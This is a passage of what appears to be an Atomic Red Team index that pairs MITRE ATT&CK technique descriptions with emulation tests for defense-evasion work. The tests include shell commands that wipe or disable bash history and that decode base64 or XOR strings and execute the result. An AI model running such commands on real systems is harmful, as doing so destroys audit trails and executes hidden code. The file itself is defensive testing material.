password filter would receive these plain-text credentials every time a password request is made.(Citation: Carnal Ownage Password Filters Sept 2013)" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - kill_chain_name: mitre-attack phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: persistence x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Vincent Le Toux x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '2.1' identifier: T1556.002 atomic_tests: [] T1070.007: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--3975dbb5-0e1e-4f5b-bae1-cf2ab84b46dc created: '2022-06-15T18:00:04.219Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1070/007 external_id: T1070.007 - source_name: FreeDesktop Journal description: freedesktop.org. (n.d.). systemd-journald.service. Retrieved June 15, 2022. url: https://www.freedesktop.org/software/systemd/man/systemd-journald.service.html - source_name: Microsoft RDP Removal description: Microsoft. (2021, September 24). How to remove entries from the Remote Desktop Connection Computer box. Retrieved June 15, 2022. url: https://docs.microsoft.com/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer - source_name: Moran RDPieces description: Moran, B. (2020, November 18). Putting Together the RDPieces. Retrieved October 17, 2022. url: https://www.osdfcon.org/presentations/2020/Brian-Moran_Putting-Together-the-RDPieces.pdf - source_name: Apple Culprit Access description: rjben. (2012, May 30). How do you find the culprit when unauthorized access to a computer is a problem?. Retrieved August 3, 2022. url: https://discussions.apple.com/thread/3991574 - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved August 19, 2021.' url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-04-16T20:37:16.734Z' name: Clear Network Connection History and Configurations description: |- Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations. Configuration settings as well as various artifacts that highlight connection history may be created on a system and/or in application logs from behaviors that require network connections, such as [Remote Services](https://attack.mitre.org/techniques/T1021) or [External Remote Services](https://attack.mitre.org/techniques/T1133). Defenders may use these artifacts to monitor or otherwise analyze network connections created by adversaries. Network connection history may be stored in various locations. For example, RDP connection history may be stored in Windows Registry values under (Citation: Microsoft RDP Removal): * HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default * HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers Windows may also store information about recent RDP connections in files such as C:\Users\\%username%\Documents\Default.rdp and `C:\Users\%username%\AppData\Local\Microsoft\Terminal Server Client\Cache\`.(Citation: Moran RDPieces) Similarly, macOS and Linux hosts may store information highlighting connection history in system logs (such as those stored in `/Library/Logs` and/or `/var/log/`).(Citation: Apple Culprit Access)(Citation: FreeDesktop Journal)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing) Malicious network connections may also require changes to third-party applications or network configuration settings, such as [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004) or tampering to enable [Proxy](https://attack.mitre.org/techniques/T1090). Adversaries may delete or modify this data to conceal indicators and/or impede defensive analysis. kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - CrowdStrike Falcon OverWatch x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS - Windows - Network Devices x_mitre_version: '1.2' atomic_tests: [] T1600.001: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--3a40f208-a9c1-4efa-a598-4003c3681fb8 created: '2020-10-19T19:03:48.310Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1600/001 external_id: T1600.001 - source_name: Cisco Synful Knock Evolution description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020. url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices - source_name: Cisco Blog Legacy Device Attacks description: Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020. url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:40.223Z' name: Reduce Key Space description: |- Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution) Adversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key. Adversaries may modify the key size used and other encryption parameters using specialized commands in a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) introduced to the system through [Modify System Image](https://attack.mitre.org/techniques/T1601) to change the configuration of the device. (Citation: Cisco Blog Legacy Device Attacks) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Network Devices x_mitre_version: '1.1' atomic_tests: [] T1070.003: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a created: '2020-01-31T12:32:08.228Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1070/003 external_id: T1070.003 - source_name: Broadcom ESXi Shell Audit description: Broadcom. (2025, February 20). Auditing ESXi Shell logins and commands. Retrieved March 26, 2025. url: https://knowledge.broadcom.com/external/article/321910/auditing-esxi-shell-logins-and-commands.html - source_name: Sophos PowerShell command audit description: jak. (2020, June 27). Live Discover - PowerShell command audit. Retrieved August 21, 2020. url: https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit - source_name: Microsoft PowerShell Command History description: Microsoft. (2020, May 13). About History. Retrieved September 4, 2020. url: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7 - source_name: US-CERT-TA18-106A description: US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020. url: https://www.us-cert.gov/ncas/alerts/TA18-106A - source_name: Sophos PowerShell Command History Forensics description: Vikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved November 17, 2024. url: https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:40.313Z' name: 'Indicator Removal on Host: Clear Command History' description: "In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.\n\nOn Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions. Adversaries may delete their commands from these logs by manually clearing the history (history -c) or deleting the bash history file rm ~/.bash_history. \ \n\nAdversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to clear command history data (clear logging and/or clear history).(Citation: US-CERT-TA18-106A) On ESXi servers, command history may be manually removed from the `/var/log/shell.log` file.(Citation: Broadcom ESXi Shell Audit)\n\nOn Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the PSReadLine module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.\n\nThe PSReadLine command history tracks the commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)\n\nAdversaries may run the PowerShell command Clear-History to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the ConsoleHost_history.txt file. Adversaries may also delete the ConsoleHost_history.txt file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Vikas Singh, Sophos - Emile Kenning, Sophos - Austin Clark, @c2defense x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - ESXi - Linux - macOS - Network Devices - Windows x_mitre_version: '1.6' identifier: T1070.003 atomic_tests: - name: Clear Bash history (rm) auto_generated_guid: a934276e-2be5-4a36-93fd-98adbb5bd4fc description: 'Clears bash history via rm ' input_arguments: history_path: description: Bash history path type: path default: "~/.bash_history" supported_platforms: - linux - macos executor: command: 'rm #{history_path} ' name: sh - name: Clear Bash history (cat dev/null) auto_generated_guid: b1251c35-dcd3-4ea1-86da-36d27b54f31f description: 'Clears bash history via cat /dev/null ' supported_platforms: - linux - macos input_arguments: history_path: description: Bash history path type: path default: "~/.bash_history" executor: command: 'cat /dev/null > #{history_path} ' name: sh - name: Clear Bash history (ln dev/null) auto_generated_guid: 23d348f3-cc5c-4ba9-bd0a-ae09069f0914 description: 'Clears bash history via a symlink to /dev/null ' supported_platforms: - linux - macos input_arguments: history_path: description: Bash history path type: path default: "~/.bash_history" executor: command: 'ln -sf /dev/null #{history_path} ' name: sh - name: Clear history of a bunch of shells auto_generated_guid: 7e6721df-5f08-4370-9255-f06d8a77af4c description: 'Clears the history of a bunch of different shell types by setting the history size to zero ' supported_platforms: - linux - macos executor: command: | unset HISTFILE export HISTFILESIZE=0 history -c name: sh - name: Clear and Disable Bash History Logging auto_generated_guid: 784e4011-bd1a-4ecd-a63a-8feb278512e6 description: 'Clears the history and disable bash history logging of the current shell and future shell sessions ' supported_platforms: - linux - macos executor: command: | set +o history echo 'set +o history' >> ~/.bashrc . ~/.bashrc history -c cleanup_command: | sed -i 's/set +o history//g' ~/.bashrc . ~/.bashrc set -o history name: bash - name: Use Space Before Command to Avoid Logging to History auto_generated_guid: 53b03a54-4529-4992-852d-a00b4b7215a6 description: 'Using a space before a command causes the command to not be logged in the Bash History file ' supported_platforms: - linux - macos executor: command: | hostname whoami name: sh T1202: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e created: '2018-04-18T17:59:24.739Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1202 external_id: T1202 - source_name: Bleeping Computer - Scriptrunner.exe description: Bill Toulas. (2023, January 4). Hackers abuse Windows error reporting tool to deploy malware. Retrieved July 8, 2024. url: https://www.bleepingcomputer.com/news/security/hackers-abuse-windows-error-reporting-tool-to-deploy-malware/ - source_name: Threat Actor Targets the Manufacturing industry with Lumma Stealer and Amadey Bot description: Cyble. (2024, December 5). Threat Actor Targets the Manufacturing industry with Lumma Stealer and Amadey Bot. Retrieved February 4, 2025. url: https://cyble.com/blog/threat-actor-targets-manufacturing-industry-with-malware/ - source_name: Evi1cg Forfiles Nov 2017 description: Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved September 12, 2024. url: https://x.com/Evi1cg/status/935027922397573120 - source_name: RSA Forfiles Aug 2017 description: Partington, E. (2017, August 14). Are you looking out for forfiles.exe (if you are watching for cmd.exe). Retrieved January 22, 2018. url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe - source_name: Secure Team - Scriptrunner.exe description: Secure Team - Information Assurance. (2023, January 8). Windows Error Reporting Tool Abused to Load Malware. Retrieved July 8, 2024. url: https://secureteam.co.uk/2023/01/08/windows-error-reporting-tool-abused-to-load-malware/ - source_name: SS64 description: SS64. (n.d.). ScriptRunner.exe. Retrieved July 8, 2024. url: https://ss64.com/nt/scriptrunner.html - source_name: VectorSec ForFiles Aug 2017 description: vector_sec. (2017, August 11). Defenders watching launches of cmd? What about forfiles?. Retrieved September 12, 2024. url: https://x.com/vector_sec/status/896049052642533376 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:40.495Z' name: Indirect Command Execution description: |- Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (`pcalua.exe`), components of the Windows Subsystem for Linux (WSL), `Scriptrunner.exe`, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe) Adversaries may also abuse the `ssh.exe` binary to execute malicious commands via the `ProxyCommand` and `LocalCommand` options, which can be invoked via the `-o` flag or by modifying the SSH config file.(Citation: Threat Actor Targets the Manufacturing industry with Lumma Stealer and Amadey Bot) Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads. kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Matthew Demaske, Adaptforward - Liran Ravich, CardinalOps x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: false x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '1.3' identifier: T1202 atomic_tests: [] T1140: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c created: '2017-12-14T16:46:06.044Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1140 external_id: T1140 - source_name: Volexity PowerDuke November 2016 description: 'Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017.' url: https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/ - source_name: Sentinel One Tainted Love 2023 description: Aleksandar Milenkoski, Juan Andres Guerrero-Saade, and Joey Chen. (2023, March 23). Operation Tainted Love | Chinese APTs Target Telcos in New Attacks. Retrieved March 18, 2025. url: https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/ - source_name: Malwarebytes Targeted Attack against Saudi Arabia description: Malwarebytes Labs. (2017, March 27). New targeted attack against Saudi Arabia Government. Retrieved July 3, 2017. url: https://blog.malwarebytes.com/cybercrime/social-engineering-cybercrime/2017/03/new-targeted-attack-saudi-arabia-government/ - source_name: Carbon Black Obfuscation Sept 2016 description: Tedesco, B. (2016, September 23). Security Alert Summary. Retrieved February 12, 2018. url: https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:40.925Z' name: Deobfuscate/Decode Files or Information description: |- Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system. One such example is the use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file.(Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows copy /b or type command to reassemble binary fragments into a malicious payload.(Citation: Carbon Black Obfuscation Sept 2016)(Citation: Sentinel One Tainted Love 2023) Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary.(Citation: Volexity PowerDuke November 2016) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Matthew Demaske, Adaptforward - Red Canary - Cristóbal Martínez Martín x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: false x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - ESXi - Linux - macOS - Windows x_mitre_version: '1.4' identifier: T1140 atomic_tests: - name: Base64 decoding with Python auto_generated_guid: 356dc0e8-684f-4428-bb94-9313998ad608 description: 'Use Python to decode a base64-encoded text string and echo it to the console ' supported_platforms: - linux - macos input_arguments: message: description: Message to print to the screen type: string default: Hello from Atomic Red Team test T1140! encoded_file: description: File to temporarily save encoded text type: path default: "/tmp/T1140.encoded" dependencies: - description: 'Python must be present ' prereq_command: 'which python3 ' get_prereq_command: 'echo "Please install Python 3" ' executor: name: sh elevation_required: false command: | ENCODED=$(python3 -c 'import base64;enc=base64.b64encode("#{message}".encode());print(enc.decode())') python3 -c "import base64;dec=base64.b64decode(\"$ENCODED\");print(dec.decode())" python3 -c "import base64 as d;dec=d.b64decode(\"$ENCODED\");print(dec.decode())" python3 -c "from base64 import b64decode;dec=b64decode(\"$ENCODED\");print(dec.decode())" python3 -c "from base64 import b64decode as d;dec=d(\"$ENCODED\");print(dec.decode())" echo $ENCODED | python3 -c "import base64,sys;dec=base64.b64decode(sys.stdin.read());print(dec.decode())" echo $ENCODED > #{encoded_file} && python3 -c "import base64;dec=base64.b64decode(open('#{encoded_file}').read());print(dec.decode())" - name: Base64 decoding with Perl auto_generated_guid: 6604d964-b9f6-4d4b-8ce8-499829a14d0a description: "Use Perl to decode a base64-encoded text string and echo it to the console \n" supported_platforms: - linux - macos input_arguments: message: description: Message to print to the screen type: string default: Hello from Atomic Red Team test T1140! encoded_file: description: File to temporarily save encoded text type: path default: "/tmp/T1140.encoded" dependencies: - description: 'Perl must be present ' prereq_command: 'which perl ' get_prereq_command: 'echo "Please install Perl" ' executor: name: sh elevation_required: false command: | ENCODED=$(perl -e "use MIME::Base64;print(encode_base64('#{message}'));") perl -le "use MIME::Base64;print(decode_base64('$ENCODED'));" echo $ENCODED | perl -le 'use MIME::Base64;print(decode_base64());' echo $ENCODED > #{encoded_file} && perl -le 'use MIME::Base64;open($f,"<","#{encoded_file}");print(decode_base64(<$f>));' - name: Base64 decoding with shell utilities auto_generated_guid: b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e description: 'Use common shell utilities to decode a base64-encoded text string and echo it to the console ' supported_platforms: - linux - macos input_arguments: message: description: Message to print to the screen type: string default: Hello from Atomic Red Team test T1140! encoded_file: description: File to temporarily save encoded text type: path default: "/tmp/T1140.encoded" executor: name: sh elevation_required: false command: | ENCODED=$(echo '#{message}' | base64) printf $ENCODED | base64 -d echo $ENCODED | base64 -d echo $(echo $ENCODED) | base64 -d echo $ENCODED > #{encoded_file} && base64 -d #{encoded_file} echo $ENCODED > #{encoded_file} && base64 -d < #{encoded_file} echo $ENCODED > #{encoded_file} && cat #{encoded_file} | base64 -d echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | base64 -d bash -c "{echo,\"$(echo $ENCODED)\"}|{base64,-d}" - name: Hex decoding with shell utilities auto_generated_guid: '005943f9-8dd5-4349-8b46-0313c0a9f973' description: 'Use common shell utilities to decode a hex-encoded text string and echo it to the console ' supported_platforms: - linux - macos input_arguments: message: description: Message to print to the screen type: string default: Hello from Atomic Red Team test T1140! encoded_file: description: File to temporarily save encoded text type: path default: "/tmp/T1140.encoded" dependencies: - description: 'xxd must be present ' prereq_command: 'which xxd ' get_prereq_command: 'echo "Please install xxd" ' executor: name: sh elevation_required: false command: | ENCODED=$(echo '#{message}' | xxd -ps -c 256) printf $ENCODED | xxd -r -p echo $ENCODED | xxd -r -p echo $(echo $ENCODED) | xxd -r -p echo $ENCODED > #{encoded_file} && xxd -r -p #{encoded_file} echo $ENCODED > #{encoded_file} && xxd -r -p < #{encoded_file} echo $ENCODED > #{encoded_file} && cat #{encoded_file} | xxd -r -p echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | xxd -r -p - name: Linux Base64 Encoded Shebang in CLI auto_generated_guid: 3a15c372-67c1-4430-ac8e-ec06d641ce4d description: "Using Linux Base64 Encoded shell scripts that have Shebang in them. This is commonly how attackers obfuscate passing and executing a shell script. Seen [here](https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html) by TrendMicro, as well as [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS). Also a there is a great Sigma rule [here](https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml) for it. \n" supported_platforms: - linux - macos input_arguments: bash_encoded: description: Encoded type: string default: IyEvYmluL2Jhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo= dash_encoded: description: Encoded type: string default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo= fish_encoded: description: Encoded type: string default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo= sh_encoded: description: Encoded type: string default: IyEvYmluL3NoCmVjaG8gImh0dHBzOi8vd3d3LnlvdXR1YmUuY29tL0BhdG9taWNzb25hZnJpZGF5IEZUVyIK dependencies: - description: 'base64 must be present ' prereq_command: 'which base64 ' get_prereq_command: 'echo "please install base64" ' executor: name: sh elevation_required: false command: | echo #{bash_encoded} | base64 -d | bash echo #{dash_encoded} | base64 -d | bash echo #{fish_encoded} | base64 -d | bash echo #{sh_encoded} | base64 -d | bash - name: XOR decoding and command execution using Python auto_generated_guid: c3b65cd5-ee51-4e98-b6a3-6cbdec138efc description: An adversary can obfuscate malicious commands or payloads using XOR and execute them on the victim's machine. This test uses Python to decode and execute commands on the machine. supported_platforms: - linux - macos input_arguments: xor_key: description: 'Key used to decrypt the command ' type: string default: waEHleblxiQjoxFJQaIMLdHKz encrypted_command: description: Encrypted command that will be executed type: string default: AAkqKQEM dependency_executor_name: bash dependencies: - description: Python3 must be installed prereq_command: which python3 get_prereq_command: echo "Install Python3" executor: command: 'python3 -c ''import base64; import subprocess; xor_decrypt = lambda text, key: "".join([chr(c ^ ord(k)) for c, k in zip(base64.b64decode(text.encode()), key)]); command = "#{encrypted_command}"; key = "#{xor_key}"; exec = xor_decrypt(command, key); subprocess.call(exec, shell=True)''' cleanup_command: name: bash elevation_required: false T1562: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529 created: '2020-02-21T20:22:13.470Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1562 external_id: T1562 - source_name: Google Cloud Mandiant UNC3886 2024 description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert: Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024." url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations - source_name: Emotet shutdown description: The DFIR Report. (2022, November 8). Emotet Strikes Again – LNK File Leads to Domain Wide Ransomware. Retrieved March 6, 2023. url: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:41.123Z' name: Impair Defenses description: |+ Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators. Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Jamie Williams (U ω U), PANW Unit 42 - Liran Ravich, CardinalOps x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: false x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows - IaaS - Linux - macOS - Containers - Network Devices - Identity Provider - Office Suite - ESXi x_mitre_version: '1.7' identifier: T1562 atomic_tests: [] T1055.003: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--41d9846c-f6af-4302-a654-24bba2729bc6 created: '2020-01-14T01:28:32.166Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1055/003 external_id: T1055.003 - source_name: Elastic Process Injection July 2017 description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.' url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:42.433Z' name: Thread Execution Hijacking description: "Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process. \n\nThread Execution Hijacking is commonly performed by suspending an existing process then unmapping/hollowing its memory, which can then be replaced with malicious code or the path to a DLL. A handle to an existing victim process is first created with native Windows API calls such as OpenThread. At this point the process can be suspended then written to, realigned to the injected code, and resumed via SuspendThread , VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.(Citation: Elastic Process Injection July 2017)\n\nThis is very similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) but targets an existing process rather than creating a process in a suspended state. \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via Thread Execution Hijacking may also evade detection from security products since the execution is masked under a legitimate process. " kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: privilege-escalation x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '1.2' identifier: T1055.003 atomic_tests: [] T1036: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0 created: '2017-05-31T21:30:38.511Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1036 external_id: T1036 - source_name: Twitter ItsReallyNick Masquerading Update description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved September 12, 2024. url: https://x.com/ItsReallyNick/status/1055321652777619457 - source_name: Elastic Masquerade Ball description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball. Retrieved October 31, 2016.' url: https://www.elastic.co/blog/how-hunt-masquerade-ball - source_name: LOLBAS Main Site description: LOLBAS. (n.d.). Living Off The Land Binaries and Scripts (and also Libraries). Retrieved February 10, 2020. url: https://lolbas-project.github.io/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:42.609Z' name: Masquerading description: |- Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names. Renaming 